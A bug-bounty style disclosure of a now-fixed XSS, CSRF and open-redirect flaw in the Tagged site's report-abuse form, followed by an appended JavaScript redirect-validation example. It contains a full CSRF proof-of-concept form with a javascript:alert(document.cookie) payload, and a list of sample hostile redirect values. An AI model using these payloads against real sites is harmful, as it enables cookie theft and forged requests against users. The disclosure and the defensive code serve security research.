XSS+CSRF attack in Tagged using Redirect parameter (Open URL Redirection attack possible)
Hi guys,
Today I want to show you how you can combine XSS and CSRF attacks. This is very interesting, but it is pretty difficult to find and to create a POC for.
Bug type : XSS+CSRF
Bug category : XSS,CSRF
OWASP link :
1. https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
2. https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)
Description : In Tagged you can report any user for spam/abuse. In the HTTP POST request for the report you will find a hidden parameter called "referer". Its value is the URL you are redirected to, so you can also use it to redirect a victim to any website (open redirection).
Now, in JavaScript, when you give any URL as the referer, it will redirect you to that URL. But when you put javascript:alert(1) as the URL, it will execute the code you provide.
Attack Steps :
1. Create a CSRF POC in which you give the XSS payload javascript:alert(1).
2. Click on the button and you will get the XSS pop-up.
3. You can also redirect the victim to any malicious URL by putting that URL in referer.
XSS parameter used : javascript:alert(document.cookie) in referer
Proxy Tool used : Burp Suite
HTML Code for CSRF:
<html>
<body>
<form action="http://m.tagged.com/report_abuse.html" method="POST">
<input type="hidden" name="report_userId" value="6025854846">
<input type="hidden" name="referer" value="javascript:alert(document.cookie)">
<input type="hidden" name="contentId" value="1436985861035340">
<input type="hidden" name="reason" value="threads">
<input type="submit">
</form>
</body>
</html>
Status : Fixed
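The Description above says the referer value was used directly as the navigation target, which is why a javascript: URL ran script and any external URL produced an open redirect. One way to validate such a value before navigating, as an added example that is not from the original post or from Tagged's code; the names ALLOWED_ORIGIN and safeRedirectTarget and the sample values are assumptions for illustration.

```javascript
// Added example (not from the original post). ALLOWED_ORIGIN, safeRedirectTarget
// and the SAMPLES list are assumptions chosen for illustration.
const ALLOWED_ORIGIN = "http://m.tagged.com";

// Return an absolute same-origin http(s) URL to navigate to, or the site root
// when the supplied value is anything else.
function safeRedirectTarget(raw, allowedOrigin = ALLOWED_ORIGIN) {
  const base = new URL(allowedOrigin);
  const fallback = new URL("/", base).href;
  if (typeof raw !== "string") return fallback;
  // URL parsers silently drop tab/CR/LF and treat "\" like "/", which can
  // disguise a scheme or a host; reject such values up front.
  if (/[\u0000-\u001f\u007f\\]/.test(raw)) return fallback;
  let url;
  try {
    url = new URL(raw.trim(), base); // relative values resolve against our origin
  } catch {
    return fallback;
  }
  // Scheme allow-list: javascript:, data: and every other scheme is refused.
  if (url.protocol !== "http:" && url.protocol !== "https:") return fallback;
  // Exact origin match stops "//other.example" and "m.tagged.com@other.example".
  if (url.origin !== base.origin) return fallback;
  if (url.username !== "" || url.password !== "") return fallback;
  // Return the absolute form: a pathname that begins with "//" would be read
  // by the browser as a protocol-relative URL pointing at another host.
  return url.href;
}

// Constructed sample values for the "referer" field.
const SAMPLES = [
  "javascript:alert(document.cookie)",
  "JaVaScRiPt:alert(1)",
  "java\tscript:alert(1)",
  "//other.example/landing",
  "http://m.tagged.com@other.example/",
  "/.//other.example",
  "/profile.html?id=1",
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "->", safeRedirectTarget(s));
}
```

This covers only the redirect sink; the forged cross-site POST itself is a separate problem that needs an anti-CSRF token on the report form.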